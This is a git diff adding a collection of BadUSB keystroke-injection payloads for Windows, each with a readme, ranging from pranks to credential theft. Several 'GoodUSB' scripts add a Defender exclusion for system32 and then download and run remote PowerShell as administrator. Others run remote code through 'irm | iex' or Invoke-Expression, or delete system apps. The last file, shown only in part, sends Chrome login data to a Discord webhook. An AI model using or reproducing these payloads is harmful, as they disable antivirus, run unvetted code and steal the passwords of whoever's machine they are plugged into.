+ENTER
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Matrix_Rain_CMD/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Matrix_Rain_CMD/readme.md
new file mode 100644
index 000000000..de5ddc6a8
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Matrix_Rain_CMD/readme.md
@@ -0,0 +1,36 @@
+
+# Matrix_Rain_CMD
+There'll be the matrix rain in the windows cmd.
+
+## How to use?
+
+This script is plug and play.
+
+
+## Features
+
+- open cmd
+- write script
+- maximize window
+
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/NoMoreSound/NoMoreSound.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/NoMoreSound/NoMoreSound.txt
new file mode 100644
index 000000000..7705a557a
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/NoMoreSound/NoMoreSound.txt
@@ -0,0 +1,18 @@
+REM Author: UNC0V3R3D
+REM Description: Mutes windows audio...
+REM Version: 1.0
+REM Category: FUN
+DELAY 500
+GUI r
+DELAY 300
+STRING powershell Start-Process powershell -Verb runAs
+DELAY 200
+ENTER
+DELAY 600
+LEFTARROW
+DELAY 300
+ENTER
+DELAY 450
+STRING (new-object -com wscript.shell).SendKeys([char]173)
+DELAY 200
+ENTER
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/NoMoreSound/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/NoMoreSound/readme.md
new file mode 100644
index 000000000..dc009355c
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/NoMoreSound/readme.md
@@ -0,0 +1,35 @@
+
+# NoMoreSound
+Mutes the windows audio.
+
+## How to use?
+
+This script is plug and play.
+
+
+## Features
+
+- open powershell
+- mute windows audio
+
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Rotate_Monitor/monitor_rotation.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Rotate_Monitor/monitor_rotation.txt
new file mode 100644
index 000000000..2ccc47c20
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Rotate_Monitor/monitor_rotation.txt
@@ -0,0 +1,16 @@
+REM Author: UNC0V3R3D
+REM Description: Uses powershell to rotate the monitor by 90 degrees.
+REM Version: 1.0
+REM Category: FUN
+DELAY 800
+GUI r
+DELAY 800
+STRING powershell Start-Process powershell -Verb runAs
+DELAY 800
+ENTER
+DELAY 800
+LEFTARROW
+DELAY 800
+ENTER
+DELAY 500
+STRING Invoke-Expression (Invoke-WebRequest -Uri "https://raw.githubusercontent.com/UNC0V3R3D/resources/main/monitor_rotation.ps1").Content
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Rotate_Monitor/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Rotate_Monitor/readme.md
new file mode 100644
index 000000000..df3e46609
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/Rotate_Monitor/readme.md
@@ -0,0 +1,31 @@
+# Rotate_Monitor
+Uses powershell to rotate the monitor by 90 degrees.
+
+## How to use?
+
+This script is plug and play.
+
+
+## Features
+
+- open powershell
+- rotate monitor by 90°
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/WordPrank/WordPrank.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/WordPrank/WordPrank.txt
new file mode 100644
index 000000000..5d1a221e6
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/WordPrank/WordPrank.txt
@@ -0,0 +1,37 @@
+REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
+REM Description: Basically changes the Auto-Correction and makes "and" being corrected to "nad". But you can put any word you want.
+REM Version: 1.0
+REM Category: FUN
+DELAY 2000
+GUI r
+DELAY 200
+STRING winword
+ENTER
+DELAY 1000
+ENTER
+DELAY 200
+ALT q
+DELAY 300
+STRING options spelling
+DELAY 500
+ENTER
+DELAY 200
+TAB
+DELAY 200
+ENTER
+DELAY 200
+STRING and
+DELAY 200
+TAB
+STRING nad
+DELAY 200
+ALT a
+DELAY 200
+ENTER
+DELAY 200
+SHIFT TAB
+DELAY 200
+ENTER
+DELAY 200
+ALT F4
+DELAY 200
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/WordPrank/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/WordPrank/readme.md
new file mode 100644
index 000000000..636560512
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/WordPrank/readme.md
@@ -0,0 +1,38 @@
+
+# WordPrank
+Basically changes the Auto-Correction and makes "and" being corrected to "nad". But you can put any word you want.
+
+## How to use?
+
+This script is not plug and play. You need to the following changes:
+
+- change first word "STRING and"
+- change first word to anything you want "STRING nad"
+
+
+## Features
+
+- open word
+- change auto correction
+
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/justdance/justdance.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/justdance/justdance.txt
new file mode 100644
index 000000000..77cbb7ca9
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/justdance/justdance.txt
@@ -0,0 +1,26 @@
+REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
+REM Description: Sets volume to 100% and plays "just dance remix". And yes I know, that the Set-Volume command exists twice. It has to be run twice for it to work.
+REM Version: 1.0
+REM Category: FUN
+DELAY 700
+GUI r
+DELAY 650
+STRING powershell Start-Process powershell -Verb runAs
+DELAY 650
+ENTER
+DELAY 650
+LEFTARROW
+DELAY 650
+ENTER
+DELAY 650
+STRING Set-Volume 100; Function Set-Volume { Param([Parameter(Mandatory=$true)][ValidateRange(0,100)][Int]$volume); $keyPresses = [Math]::Ceiling( $volume / 2 ); $obj = New-Object -ComObject WScript.Shell; 1..50 | ForEach-Object { $obj.SendKeys( [char] 174 ) }; for( $i = 0; $i -lt $keyPresses; $i++ ) {$obj.SendKeys( [char] 175 )}; }
+DELAY 650
+ENTER
+DELAY 650
+STRING Set-Volume 100; Function Set-Volume { Param([Parameter(Mandatory=$true)][ValidateRange(0,100)][Int]$volume); $keyPresses = [Math]::Ceiling( $volume / 2 ); $obj = New-Object -ComObject WScript.Shell; 1..50 | ForEach-Object { $obj.SendKeys( [char] 174 ) }; for( $i = 0; $i -lt $keyPresses; $i++ ) {$obj.SendKeys( [char] 175 )}; }
+DELAY 650
+ENTER
+DELAY 550
+STRING Start-Process -WindowStyle Hidden "https://www.youtube.com/watch?v=7W9IOhk1-z4"
+DELAY 500
+ENTER
\ No newline at end of file
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/justdance/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/justdance/readme.md
new file mode 100644
index 000000000..78baacbf1
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/justdance/readme.md
@@ -0,0 +1,36 @@
+
+# justdance
+Sets volume to 100% and plays "just dance remix". And yes I know, that the Set-Volume command exists twice. It has to be run twice for it to work.
+
+## How to use?
+
+This script is plug and play.
+
+
+## Features
+
+- open video
+- turn up volume
+- maximize window
+
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Activate_Windows/activate_windows.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Activate_Windows/activate_windows.txt
new file mode 100644
index 000000000..32f7ad2cf
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Activate_Windows/activate_windows.txt
@@ -0,0 +1,22 @@
+REM Author: 0xlunar
+REM Description: Activate Windows permanently with MAS
+REM Version: 1.1
+REM Category: GoodUSB
+DELAY 500
+GUI r
+DELAY 500
+STRING powershell Start-Process powershell -Verb runAs
+CTRL-SHIFT ENTER
+DELAY 1500
+SHIFT TAB
+DELAY 500
+ENTER
+DELAY 1500
+STRING irm https://massgrave.dev/get | iex
+ENTER
+DELAY 4000
+STRING 1
+DELAY 500
+STRING 1
+DELAY 500
+STRING 1
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Activate_Windows/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Activate_Windows/readme.md
new file mode 100644
index 000000000..b1158fe9d
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Activate_Windows/readme.md
@@ -0,0 +1,35 @@
+
+# activate_windows
+Activates Windows using MAS.
+
+## How to use?
+
+This script is plug and play. Note that you may need to change the delay to a higher number.
+
+
+## Features
+
+- open powershell
+- download MAS
+- activate Windows
+
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Bloatware_removal/bloatware_remover.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Bloatware_removal/bloatware_remover.txt
new file mode 100644
index 000000000..7a46e5571
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Bloatware_removal/bloatware_remover.txt
@@ -0,0 +1,19 @@
+REM Author: UNC0V3R3D
+REM Description: Remove bloatware from your windows computer.
+REM Version: 1.0
+REM Category: GoodUSB
+DELAY 500
+GUI r
+DELAY 500
+STRING powershell Start-Process powershell -Verb runAs
+CTRL-SHIFT ENTER
+DELAY 1500
+SHIFT TAB
+DELAY 500
+ENTER
+DELAY 1500
+STRING Add-MpPreference -ExclusionPath C:\Windows\system32
+ENTER
+DELAY 500
+STRING New-Object System.Net.WebClient | %{$_.DownloadFile('https://github.com/UNC0V3R3D/ressources/blob/main/remove_bloatware_regkeys.ps1', 'script.ps1'); Start-Process powershell.exe -Verb runAs -ArgumentList "-File script.ps1"}, exit
+ENTER
\ No newline at end of file
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Bloatware_removal/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Bloatware_removal/readme.md
new file mode 100644
index 000000000..f7aaf61e0
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Bloatware_removal/readme.md
@@ -0,0 +1,36 @@
+
+# Bloatware_remover
+Removes useless software from your pc.
+
+## How to use?
+
+This script is plug and play.
+
+
+## Features
+
+- open powershell
+- download ps1 script
+- remove bloatware
+
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Clear_Explorer/clear_explorer.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Clear_Explorer/clear_explorer.txt
new file mode 100644
index 000000000..fd3d4c6c8
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Clear_Explorer/clear_explorer.txt
@@ -0,0 +1,19 @@
+REM Author: UNC0V3R3D
+REM Description: Clear last used items in the explorer app.
+REM Version: 1.0
+REM Category: GoodUSB
+DELAY 500
+GUI r
+DELAY 500
+STRING powershell Start-Process powershell -Verb runAs
+CTRL-SHIFT ENTER
+DELAY 1500
+SHIFT TAB
+DELAY 500
+ENTER
+DELAY 1500
+STRING Add-MpPreference -ExclusionPath C:\Windows\system32
+ENTER
+DELAY 500
+STRING New-Object System.Net.WebClient | %{$_.DownloadFile('https://github.com/UNC0V3R3D/ressources/blob/main/clear_last_used_items.ps1', 'script.ps1'); Start-Process powershell.exe -Verb runAs -ArgumentList "-File script.ps1"}, exit
+ENTER
\ No newline at end of file
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Clear_Explorer/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Clear_Explorer/readme.md
new file mode 100644
index 000000000..670d9a5cb
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Clear_Explorer/readme.md
@@ -0,0 +1,36 @@
+
+# clear_explorer
+Clears the list of the last used items, that you can see in the explorer app.
+
+## How to use?
+
+This script is plug and play.
+
+
+## Features
+
+- open powershell
+- download ps1 script
+- clear list
+
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Disable_Cortana/disable_cortana.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Disable_Cortana/disable_cortana.txt
new file mode 100644
index 000000000..defa13cc1
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Disable_Cortana/disable_cortana.txt
@@ -0,0 +1,19 @@
+REM Author: UNC0V3R3D
+REM Description: Disable the really annoying Cortana assistant.
+REM Version: 1.0
+REM Category: GoodUSB
+DELAY 500
+GUI r
+DELAY 500
+STRING powershell Start-Process powershell -Verb runAs
+CTRL-SHIFT ENTER
+DELAY 1500
+SHIFT TAB
+DELAY 500
+ENTER
+DELAY 1500
+STRING Add-MpPreference -ExclusionPath C:\Windows\system32
+ENTER
+DELAY 500
+STRING New-Object System.Net.WebClient | %{$_.DownloadFile('https://github.com/UNC0V3R3D/ressources/blob/main/disable_cortana.ps1', 'script.ps1'); Start-Process powershell.exe -Verb runAs -ArgumentList "-File script.ps1"}, exit
+ENTER
\ No newline at end of file
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Disable_Cortana/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Disable_Cortana/readme.md
new file mode 100644
index 000000000..4c149c764
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Disable_Cortana/readme.md
@@ -0,0 +1,36 @@
+
+# disable_cortana
+As the title says, this script will remove the Cortana assistant from windows.
+
+## How to use?
+
+This script is plug and play.
+
+
+## Features
+
+- open powershell
+- download ps1 script
+- remove cortana
+
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Enable_Cortana/enable_cortana.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Enable_Cortana/enable_cortana.txt
new file mode 100644
index 000000000..f5895055e
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Enable_Cortana/enable_cortana.txt
@@ -0,0 +1,19 @@
+REM Author: UNC0V3R3D
+REM Description: Enables the really annoying Cortana assistant.
+REM Version: 1.0
+REM Category: GoodUSB
+DELAY 500
+GUI r
+DELAY 500
+STRING powershell Start-Process powershell -Verb runAs
+CTRL-SHIFT ENTER
+DELAY 1500
+SHIFT TAB
+DELAY 500
+ENTER
+DELAY 1500
+STRING Add-MpPreference -ExclusionPath C:\Windows\system32
+ENTER
+DELAY 500
+STRING New-Object System.Net.WebClient | %{$_.DownloadFile('https://github.com/UNC0V3R3D/ressources/blob/main/enable_cortana.ps1', 'script.ps1'); Start-Process powershell.exe -Verb runAs -ArgumentList "-File script.ps1"}, exit
+ENTER
\ No newline at end of file
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Enable_Cortana/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Enable_Cortana/readme.md
new file mode 100644
index 000000000..86080ad32
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Enable_Cortana/readme.md
@@ -0,0 +1,36 @@
+
+# enable_cortana
+As the title says, this script will enable the Cortana assistant from windows.
+
+## How to use?
+
+This script is plug and play.
+
+
+## Features
+
+- open powershell
+- download ps1 script
+- enable cortana
+
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/OneDrive_Removal/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/OneDrive_Removal/readme.md
new file mode 100644
index 000000000..5be07da07
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/OneDrive_Removal/readme.md
@@ -0,0 +1,36 @@
+
+# uninstall_onedrive
+This script will download a script that will remove the onedrive app from windows.
+
+## How to use?
+
+This script is plug and play.
+
+
+## Features
+
+- open powershell
+- download ps1 script
+- remove onedrive
+
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/OneDrive_Removal/uninstall_onedrive.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/OneDrive_Removal/uninstall_onedrive.txt
new file mode 100644
index 000000000..60b6ba78a
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/OneDrive_Removal/uninstall_onedrive.txt
@@ -0,0 +1,19 @@
+REM Author: UNC0V3R3D
+REM Description: Uninstalls OneDrive.
+REM Version: 1.0
+REM Category: GoodUSB
+DELAY 500
+GUI r
+DELAY 500
+STRING powershell Start-Process powershell -Verb runAs
+CTRL-SHIFT ENTER
+DELAY 1500
+SHIFT TAB
+DELAY 500
+ENTER
+DELAY 1500
+STRING Add-MpPreference -ExclusionPath C:\Windows\system32
+ENTER
+DELAY 500
+STRING New-Object System.Net.WebClient | %{$_.DownloadFile('https://github.com/UNC0V3R3D/ressources/blob/main/uninstall_onedrive.ps1', 'script.ps1'); Start-Process powershell.exe -Verb runAs -ArgumentList "-File script.ps1"}, exit
+ENTER
\ No newline at end of file
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Privacy_Windows/privacy.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Privacy_Windows/privacy.txt
new file mode 100644
index 000000000..2f9684c37
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Privacy_Windows/privacy.txt
@@ -0,0 +1,19 @@
+REM Author: UNC0V3R3D
+REM Description: Want to feel the privacy on Windows?
+REM Version: 1.0
+REM Category: GoodUSB
+DELAY 500
+GUI r
+DELAY 500
+STRING powershell Start-Process powershell -Verb runAs
+CTRL-SHIFT ENTER
+DELAY 1500
+SHIFT TAB
+DELAY 500
+ENTER
+DELAY 1500
+STRING Add-MpPreference -ExclusionPath C:\Windows\system32
+ENTER
+DELAY 500
+STRING New-Object System.Net.WebClient | %{$_.DownloadFile('https://github.com/UNC0V3R3D/ressources/blob/main/privacy.ps1', 'script.ps1'); Start-Process powershell.exe -Verb runAs -ArgumentList "-File script.ps1"}, exit
+ENTER
\ No newline at end of file
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Privacy_Windows/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Privacy_Windows/readme.md
new file mode 100644
index 000000000..cc7d99704
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Privacy_Windows/readme.md
@@ -0,0 +1,36 @@
+
+# privacy
+This script will download and execute a large script that removes features that likely do not provide much privacy.
+
+## How to use?
+
+This script is plug and play.
+
+
+## Features
+
+- open powershell
+- download ps1 script
+- provide privacy
+
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Win_Debloater/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Win_Debloater/readme.md
new file mode 100644
index 000000000..bcc7a49be
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Win_Debloater/readme.md
@@ -0,0 +1,36 @@
+
+# win_debloat
+This script will uninstall unnecessary and potentially useless apps.
+
+## How to use?
+
+This script is plug and play.
+
+
+## Features
+
+- open powershell
+- download ps1 script
+- delete useless apps
+
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Win_Debloater/win_debloat.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Win_Debloater/win_debloat.txt
new file mode 100644
index 000000000..23a085a44
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/GoodUSB/Win_Debloater/win_debloat.txt
@@ -0,0 +1,19 @@
+REM Author: UNC0V3R3D
+REM Description: Debloat windows.
+REM Version: 1.0
+REM Category: GoodUSB
+DELAY 500
+GUI r
+DELAY 500
+STRING powershell Start-Process powershell -Verb runAs
+CTRL-SHIFT ENTER
+DELAY 1500
+SHIFT TAB
+DELAY 500
+ENTER
+DELAY 1500
+STRING Add-MpPreference -ExclusionPath C:\Windows\system32
+ENTER
+DELAY 500
+STRING New-Object System.Net.WebClient | %{$_.DownloadFile('https://github.com/UNC0V3R3D/ressources/blob/main/debloat_windows.ps1', 'script.ps1'); Start-Process powershell.exe -Verb runAs -ArgumentList "-File script.ps1"}, exit
+ENTER
\ No newline at end of file
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/MoreSeriousFUN/DeleteMicrosoftStore/DeleteMicrosoftStore.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/MoreSeriousFUN/DeleteMicrosoftStore/DeleteMicrosoftStore.txt
new file mode 100644
index 000000000..051e30ea9
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/MoreSeriousFUN/DeleteMicrosoftStore/DeleteMicrosoftStore.txt
@@ -0,0 +1,22 @@
+REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
+REM Description: Deletes the Microsoft Store
+REM Version: 1.0
+REM Category: Fun
+DELAY 500
+GUI r
+DELAY 300
+REM Start PowerShell as Admin
+STRING powershell Start-Process powershell -Verb runAs
+DELAY 300
+ENTER
+DELAY 500
+LEFTARROW
+DELAY 450
+ENTER
+DELAY 600
+REM Deletes Microsoft Store
+STRING Get-AppxPackage *windowsstore*|Remove-AppxPackage
+DELAY 200
+ENTER
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/MoreSeriousFUN/DeleteMicrosoftStore/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/MoreSeriousFUN/DeleteMicrosoftStore/readme.md
new file mode 100644
index 000000000..e3b659c32
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/MoreSeriousFUN/DeleteMicrosoftStore/readme.md
@@ -0,0 +1,35 @@
+
+# DeleteMicrosoftStore
+This script will delete the Microsoft Store.
+
+## How to use?
+
+This script is plug and play.
+
+
+## Features
+
+- open powershell
+- remove MS store package
+
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/MoreSeriousFUN/DeleteWindowsMail/DeleteWindowsMail.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/MoreSeriousFUN/DeleteWindowsMail/DeleteWindowsMail.txt
new file mode 100644
index 000000000..6dfb6491a
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/MoreSeriousFUN/DeleteWindowsMail/DeleteWindowsMail.txt
@@ -0,0 +1,20 @@
+REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
+REM Description: Deletes the Windows Mail app.
+REM Version: 1.0
+REM Category: Fun
+DELAY 500
+GUI r
+DELAY 300
+REM Start PowerShell as Admin
+STRING powershell Start-Process powershell -Verb runAs
+DELAY 300
+ENTER
+DELAY 500
+LEFTARROW
+DELAY 450
+ENTER
+DELAY 600
+REM Deletes Windows Mail app
+STRING AppxPackage Microsoft.windowscommunicationsapps | Remove-AppxPackage
+DELAY 200
+ENTER
\ No newline at end of file
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/ChromePasswords/chrome_passwords_discord.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/ChromePasswords/chrome_passwords_discord.txt
new file mode 100644
index 000000000..c4c86809e
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/ChromePasswords/chrome_passwords_discord.txt
@@ -0,0 +1,26 @@
+REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
+REM Description: Copies the chrome login file and sends it to a discord webhook.
+REM Version: 1.0
+REM Category: Passwords
+DELAY 500
+WINDOWS d
+DELAY 500
+WINDOWS r
+DELAY 500
+STRING powershell Start-Process powershell -Verb runAs
+ENTER
+DELAY 800
+LEFTARROW
+ENTER
+DELAY 800
+STRING $hookurl='YOUR-DISCORD-WEBHOOK'
+DELAY 800
+ENTER
+STRING function Upload-Discord {[CmdletBinding()]param([parameter(Position=0,Mandatory=$False)][string]$file,[parameter(Position=1,Mandatory=$False)][string]$text)$Body=@{'username'=$env:username;'content'=$text};if (-not([string]::IsNullOrEmpty($text))){Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}if (-not([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}}
+ENTER
+DELAY 300
